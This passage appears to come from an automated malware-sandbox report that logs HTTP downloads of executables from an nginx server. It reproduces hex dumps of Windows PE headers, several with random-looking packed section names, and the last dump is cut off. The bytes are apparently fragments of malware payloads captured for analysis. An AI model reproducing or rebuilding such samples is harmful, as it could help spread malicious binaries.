Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:22:07 GMTContent-Type: application/octet-streamContent-Length: 961024Last-Modified: Sat, 08 Feb 2025 18:59:01 GMTConnection: keep-aliveETag: "67a7a975-eaa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 61 a9 a7 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 fa 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 0f 00 00 04 00 00 c3 bf 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 4c 3e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 4c 3e 01 00 00 40 0d 00 00 40 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 80 0e 00 00 76 00 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:22:10 GMTContent-Type: application/octet-streamContent-Length: 2859520Last-Modified: Sat, 08 Feb 2025 18:59:50 GMTConnection: keep-aliveETag: "67a7a9a6-2ba200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 0a 00 00 00 00 00 00 00 20 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2c 00 00 04 00 00 9c f5 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 68 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 06 00 00 00 60 00 00 00 04 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 6d 71 6d 72 66 7a 72 00 60 2b 00 00 a0 00 00 00 42 2b 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 74 74 6f 70 6e 6a 76 00 20 00 00 00 00 2c 00 00 06 00 00 00 7a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2c 00 00 22 00 00 00 80 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:22:17 GMTContent-Type: application/octet-streamContent-Length: 10302976Last-Modified: Fri, 24 Jan 2025 18:07:34 GMTConnection: keep-aliveETag: "6793d6e6-9d3600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 16 9d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 24 49 00 00 bc 04 00 00 00 00 00 d0 61 06 00 00 10 00 00 00 f0 94 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 80 a0 00 00 04 00 00 f7 da 9d 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 9c 00 dc 03 00 00 00 60 a0 00 97 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 9c 00 6a a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 fa 94 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 65 22 49 00 00 10 00 00 00 24 49 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 70 a8 4b 00 00 40 49 00 00 aa 4b 00 00 28 49 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 93 07 00 00 f0 94 00 00 9e 04 00 00 d2 94 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 dc 03 00 00 00 90 9c 00 00 04 00 00 00 70 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6a a0 03 00 00 a0 9c 00 00 a2 03 00 00 74 99 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 50 a0 00 00 02 00 00 00 16 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 97 1c 00 00 00 60 a0 00 00 1e 00 00 00 18 9d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:22:20 GMTContent-Type: application/octet-streamContent-Length: 2143232Last-Modified: Sat, 08 Feb 2025 19:01:51 GMTConnection: keep-aliveETag: "67a7aa1f-20b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 40 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4b 00 00 04 00 00 9e f9 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 20 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 20 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 58 04 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2a 00 00 b0 06 00 00 02 00 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 73 6b 75 7a 66 76 68 00 00 1a 00 00 30 31 00 00 f6 19 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 73 75 74 64 78 77 72 00 10 00 00 00 30 4b 00 00 04 00 00 00 8e 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4b 00 00 22 00 00 00 92 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:22:28 GMTContent-Type: application/octet-streamContent-Length: 2859520Last-Modified: Sat, 08 Feb 2025 18:59:50 GMTConnection: keep-aliveETag: "67a7a9a6-2ba200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 0a 00 00 00 00 00 00 00 20 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2c 00 00 04 00 00 9c f5 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 68 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 06 00 00 00 60 00 00 00 04 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 6d 71 6d 72 66 7a 72 00 60 2b 00 00 a0 00 00 00 42 2b 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 74 74 6f 70 6e 6a 76 00 20 00 00 00 00 2c 00 00 06 00 00 00 7a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2c 00 00 22 00 00 00 80 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:22:36 GMTContent-Type: application/octet-streamContent-Length: 866906Last-Modified: Fri, 24 Jan 2025 12:37:12 GMTConnection: keep-aliveETag: "67938978-d3a5a"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7e 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 00 11 00 00 04 00 00 e2 fd 0d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 6a ed 00 00 00 00 00 00 00 00 00 00 e2 10 0d 00 78 29 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 6a ed 00 00 00 00 10 00 00 ee 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 f0 10 00 00 10 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:22:41 GMTContent-Type: application/octet-streamContent-Length: 814592Last-Modified: Thu, 06 Feb 2025 19:25:08 GMTConnection: keep-aliveETag: "67a50c94-c6e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 76 74 9e df 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 40 02 00 00 08 00 00 00 00 00 00 6e 5e 02 00 00 20 00 00 00 60 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 0c 00 00 06 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 5e 02 00 4b 00 00 00 00 60 02 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 02 00 0c 00 00 00 d4 5d 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 3e 02 00 00 20 00 00 00 40 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 60 02 00 00 06 00 00 00 46 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 02 00 00 02 00 00 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 10 05 00 00 a0 02 00 00 10 05 00 00 4e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 00 10 05 00 00 c0 07 00 00 10 05 00 00 5e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 08 Feb 2025 19:22:42 GMTContent-Type: application/octet-streamContent-Length: 2143232Last-Modified: Sat, 08 Feb 2025 19:01:51 GMTConnection: keep-aliveETag: "67a7aa1f-20b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 